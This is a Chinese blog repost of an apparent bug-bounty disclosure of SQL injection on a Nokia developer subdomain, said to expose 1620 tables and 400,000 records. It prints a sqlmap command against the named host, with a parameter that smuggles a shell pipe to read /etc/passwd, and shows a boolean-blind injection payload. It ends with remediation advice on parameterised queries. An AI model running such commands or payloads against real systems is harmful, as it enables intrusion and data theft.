热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

诺基亚某子站SQL注入涉及1620个表及40万数据网站安全分享!

搭了个批量漏洞扫描器~~初步扫描还真管用~具体数据没跑,就


搭了个批量%ignore_a_1%扫描器~~初步扫描
还真管用~
具体数据没跑,就是表名。
大战,求高分

注入点:
 

 python sqlmap.py -u "http://developer.qt.nokia.com/ows-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|" --tables --thread 3

 

 [15:08:58] [INFO] resuming back-end DBMS 'oracle' [15:08:58] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Parameter: user_id (GET)     Type: boolean-based blind     Title: AND boolean-based blind - WHERE or HAVING clause     Payload: user_id=1) AND 7908=7908 AND (4640=4640&file=|cat /etc/passwd| --- [15:08:59] [INFO] the back-end DBMS is Oracle back-end DBMS: Oracle

 

诺基亚某子站SQL注入涉及1620个表及40万数据

还有敏感的数据
 

诺基亚某子站SQL注入涉及1620个表及40万数据

 

解决方案:

预编译SQL语句,参数化SQL语句。

访问接口加个参数过滤就更好了。

www.dengb.comtruehttp://www.dengb.com/wzaq/1101723.htmlTechArticle诺基亚某子站SQL注入涉及1620个表及40万数据 搭了个批量漏洞扫描器~~初步扫描 还真管用~ 具体数据没跑,就是表名。 大战,求高分 注入点…

—-想了解更多的网站安全相关处理怎么解决关注<编程笔记>


推荐阅读
author-avatar
肖顾问
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有